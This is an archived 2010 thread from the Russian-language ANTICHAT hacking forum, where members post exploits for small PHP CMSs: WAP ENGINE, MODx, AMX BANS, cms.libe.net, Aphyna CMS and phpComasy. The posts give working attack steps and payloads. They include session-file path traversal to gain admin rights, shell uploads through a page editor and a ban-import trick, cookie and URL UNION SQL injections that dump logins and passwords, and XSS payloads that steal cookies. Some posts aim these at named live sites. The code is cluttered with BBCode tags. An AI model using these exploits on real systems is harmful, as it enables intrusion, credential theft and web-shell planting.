ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.08.2010, 02:42
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
WAP ENGINE 5.0
_http://wap-engine.ru/
Reverse-IP:
Нужен шелл на соседнем сайте.
->templates/run.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]]))
{
if([/COLOR][COLOR="#0000BB"]strstr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'SCRIPT_NAME'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]'modules'[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$user_data_file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"../../data/users/[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"].php"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$user_data_file[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
}
else
{
[/COLOR][COLOR="#0000BB"]$user_data_file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"data/users/[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]login[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"].php"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"]= @[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$user_data_file[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$login[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$passw[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$user_f[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]]);
...
...
...
[/COLOR][/COLOR]
->Получение админских прав.
Expl:
Заливаем в /tmp .php файл, с таким содержанием и называем его oleg
Далее создаём файл сессии в той же папки
Код:
Code:
traf|i:140459;rand|s:4:"6523";login|s:16:"../../../../oleg";pass|s:32:"fb469d7ef430b0baf0cab6c436e70375";
ЗЫ:Не забываем выставлять права.
->Заливаем шелл
В админ панели заходим в редактор страниц-> Вставляем следующий код
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
|
|
|
17.08.2010, 04:02
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
MODx Evolution CMS
Version 1.0.1 (скачать: http://modxcms.com/download/rc/MODx-1.0.1-rc-1.tar.gz )
XSS (нужны права админа)
\manager\includes\accesscontrol.inc.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$lasthittime[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]= isset([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]'1'[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]'1'[/COLOR][COLOR="#007700"]) {
if (![/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sprintf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'REPLACE INTO %s (internalKey, username, lasthit, action, id, ip)
VALUES (%d, \'%s\', \'%d\', \'%s\', %s, \'%s\')'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]$modx[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getFullTableName[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'active_users'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#FF8000"]// Table
[/COLOR][COLOR="#0000BB"]$modx[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getLoginUserID[/COLOR][COLOR="#007700"](),
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'mgrShortname'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#0000BB"]$lasthittime[/COLOR][COLOR="#007700"],
(string)[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]var_export[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$itemid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]),
[/COLOR][COLOR="#0000BB"]$ip[/COLOR][/COLOR]
Result:
http://localhost/modx-1.0.1-rc-1/manager/index.php?a=2'>alert(010101)
+
XSS на Оф Сайте:
http://modxcms.com/searchresults.html
Вписываем:
">alert(document.cookie)
|
|
|
|
17.08.2010, 21:19
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
[SIZE="3"][COLOR="Green"]AMX BANS 6.0.0
в куки
Код:
Code:
amxbans:' union select 1,0x27,1,4 -- :1233
->accsess.php.inc
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT id,username,level,email FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_webadmins` WHERE logcode='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$sid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' LIMIT 1"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {
while([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_object[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uid"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uname"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"email"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]email[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"level"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]level[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"sid"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]session_id[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"loggedin"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
->modul_iexport.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]$reason[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$plnick[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]sizeof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"])!=[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_NOREQUIREDFIELDS"[/COLOR][COLOR="#007700"];
} else {
[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"]=(int)[/COLOR][COLOR="#0000BB"]strtotime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$types[/COLOR][COLOR="#007700"]=array([/COLOR][COLOR="#DD0000"]"cfg"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"txt"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_FILENOFILE"[/COLOR][COLOR="#007700"];
} else {
[/COLOR][COLOR="#0000BB"]$file_type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strrchr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'.'[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
if(![/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file_type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$types[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_FILETYPENOTALLOWED"[/COLOR][COLOR="#007700"];
}
if([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'size'[/COLOR][COLOR="#007700"]] >= ([/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]max_file_size[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]1024[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]1024[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_FILETOBIG"[/COLOR][COLOR="#007700"];
if(![/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]) {
if(![/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"temp/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$user_msg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"_FILEUPLOADFAIL"[/COLOR][COLOR="#007700"];
} else {
[/COLOR][COLOR="#0000BB"]$handle[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"temp/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"r"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"imported"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
while (![/COLOR][COLOR="#0000BB"]feof[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$handle[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fgets[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$handle[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]128[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$bans[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"]=(int)[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$bans[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#FF8000"]//amxbans 5.x hack, exported banned.cfg with reason
[/COLOR][COLOR="#0000BB"]$reason_real[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$bans[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {
for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `player_id`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND `expired`=0"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]++; continue;}
[/COLOR][COLOR="#FF8000"]//write ban to db
[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"imported"[/COLOR][COLOR="#007700"]]++;
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans`
(`player_id`,`player_nick`,`admin_nick`,`ban_type`,`ban_reason`,`ban_created`,`ban_length`,`server_name`,`imported`) VALUES
('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$plnick[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uname"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"','S','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$reason_real[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]","[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",'"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',1)"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
}else if([/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$bans[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]])==[/COLOR][COLOR="#DD0000"]"banip"[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#FF8000"]//ban with ip
[/COLOR][COLOR="#007700"]if(![/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}$/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]++; continue;}
[/COLOR][COLOR="#FF8000"]//search for a already existing permanent ban
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT `player_ip` FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `player_id`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND `expired`=0"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
if([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]++; continue;}
[/COLOR][COLOR="#FF8000"]//write ban to db
[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"imported"[/COLOR][COLOR="#007700"]]++;
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans`(`player_ip`,`player_nick`,`admin_nick`,`ban_type`,`ban_reason`,`ban_created`,`ban_length`,`server_name`,`imported`)
VALUES
('"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$steamid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$plnick[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"uname"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"','SI','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$reason_real[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$date[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]","[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]",'"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',1)"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
} else {[/COLOR][COLOR="#0000BB"]$status[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"failed"[/COLOR][COLOR="#007700"]]++; continue;}
}
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$handle[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]//del temp file
[/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"temp/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
Импортируем список банов "bans.php.cfg" с таким содержанием:
Код:
Code:
banid 0 STEAM_0:1:1234567891011121314151617
Чтобы после импорта наш шелл не удалился, нам пришлось добавить в куки " ' "(ковычку).
В итоге в modul_iexport.php при загрузки файла, скрипт завершает работу с ошибкой.
Шелл будет доступен по адресу:
http://[path]/temp/bans.php.cfg
|
|
|
|
21.08.2010, 01:49
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
cms.libe.net => 0.5 - 0.91
Скачать: http://cms.libe.net/themen/DOWNLOAD.php
Пассив XSS
/template/cmslibenet/_suche.php
PHP код:
PHP:
[COLOR="#000000"]Stichwortsuche auf dieser Seite:
[/COLOR]" method="post" style="display:inline">
.....
$Suchbegriff=$HTTP_POST_VARS['Suchbegriff'];
if (!empty($Suchbegriff)){
echo "
X";[/COLOR]
пример на оф сайте:
http://cms.libe.net/template/cmslibenet/_suche.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#DD0000"]">alert(112233)[/COLOR][/COLOR]
путь: http://cms.libe.net/template/cmslibenet/_feedback.php
|
|
|
|
30.08.2010, 14:02
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
В интернете CMS не нашел.
Aphyna CMS
Код:
Code:
http://[host]/[path]/index.php?sec=katalog&[some text]page=%27+and+0+union+select+1,2,3,4,5,6,7,8,9,10%23
10 атрибут.
Код:
Code:
http://[hos]/[path]/index.php?sec=katalog&page=[some text]%27+and+0+union+select+1,2,3,4,5,6,7,8,9,GROUP_CONCAT%28concat_ws%28%27:%27,login,password%29%20separator%20%20%27@%27%29+FROM+users%23
http://[host]/[path]/admin
внутри:
http://[host]/[path]/admin/site_info.php
в левое поле пишем наш php код.
|
|
|
|
21.09.2010, 16:45
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147
Репутация:
211
|
|
Fashione E-Commerce Webshop
скачать
в поиске
http://www.mccabeshoes.com/index.php?page_id=search
вбиваем в поле поиска
|
|
|
|
26.10.2010, 06:35
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
|
|
|
|
26.10.2010, 22:16
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
phpComasy v1.0.1
Скачать
Активная XSS
Пример одного сайта:
Код:
Code:
http://www.natamohn.com/?id=12&mod_action=add_guestbook_entry_form
Уязвимые поля>>
Код:
Code:
Firstname* , Lastname, e-Mail , WWW , Comment*
doc: powered by phpComasy
|
|
|
|
01.11.2010, 21:56
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Apprain CMS
Version:0.1.X
